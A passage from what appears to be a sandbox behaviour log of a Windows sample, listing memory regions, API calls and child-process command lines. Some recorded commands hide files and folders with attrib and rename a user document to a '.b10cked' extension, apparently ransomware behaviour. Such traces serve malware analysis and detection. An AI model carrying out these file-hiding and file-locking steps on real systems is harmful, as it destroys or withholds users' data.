0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34873 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34874 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34875 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34876 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34877 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34878 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34879 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34880 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34881 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34882 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34883 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 34884 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34885 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 862 os_tid = 0xd0 Process: id = "623" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "621" os_parent_pid = "0x9bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34886 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34887 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34888 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34889 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34890 start_va = 0x730000 end_va = 0x736fff entry_point = 0x730000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34891 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34892 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34893 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34894 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 34895 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34896 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34897 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34898 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34899 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 34900 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 34901 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34902 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34903 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34904 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34905 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34906 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34907 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34908 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34909 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34910 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34911 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34912 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34913 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 34914 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34915 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 863 os_tid = 0xd8 Process: id = "624" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "621" os_parent_pid = "0x9bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34916 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34917 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34918 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34919 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34920 start_va = 0x1f0000 end_va = 0x1f6fff entry_point = 0x1f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 34921 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34922 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34923 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34924 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 34925 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34927 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34928 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34929 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 34930 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34931 start_va = 0x6efc0000 end_va = 0x6efdcfff entry_point = 0x6efc0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 34932 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34933 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34934 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34935 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34936 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34937 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34938 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34939 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34940 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34941 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34942 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34943 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 34944 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34945 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 864 os_tid = 0xe0 Process: id = "625" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xe4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34958 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34959 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34960 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34961 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34962 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34963 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34964 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34965 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34966 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34967 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35402 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35403 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35404 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35405 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 35406 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 35407 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35408 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35409 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35410 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35411 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35412 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35413 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35414 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35415 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35416 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 35417 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35418 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35419 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35420 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35421 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 35422 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 35423 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 35424 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 35425 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 865 os_tid = 0xe8 [0235.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fe3c | out: lpSystemTimeAsFileTime=0x16fe3c*(dwLowDateTime=0xbf8d2500, dwHighDateTime=0x1d440a9)) [0235.024] GetCurrentProcessId () returned 0xe4 [0235.024] GetCurrentThreadId () returned 0xe8 [0235.024] GetTickCount () returned 0x40897 [0235.024] QueryPerformanceCounter (in: lpPerformanceCount=0x16fe34 | out: lpPerformanceCount=0x16fe34*=29181283160) returned 1 [0235.024] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.024] __set_app_type (_Type=0x1) [0235.024] __p__fmode () returned 0x76b331f4 [0235.024] __p__commode () returned 0x76b331fc [0235.024] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.025] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.025] GetCurrentThreadId () returned 0xe8 [0235.025] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe8) returned 0x38 [0235.025] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.025] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.025] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.025] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.025] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fdcc | out: phkResult=0x16fdcc*=0x0) returned 0x2 [0235.025] VirtualQuery (in: lpAddress=0x16fe03, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.025] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fd9c, dwLength=0x1c | out: lpBuffer=0x16fd9c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.025] GetConsoleOutputCP () returned 0x1b5 [0235.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.026] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.026] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.026] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.026] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.026] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.026] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.026] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.026] GetEnvironmentStringsW () returned 0x3401f8* [0235.027] FreeEnvironmentStringsW (penv=0x3401f8) returned 1 [0235.027] GetEnvironmentStringsW () returned 0x3401f8* [0235.027] FreeEnvironmentStringsW (penv=0x3401f8) returned 1 [0235.027] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ed3c | out: phkResult=0x16ed3c*=0x40) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x88, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x0, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 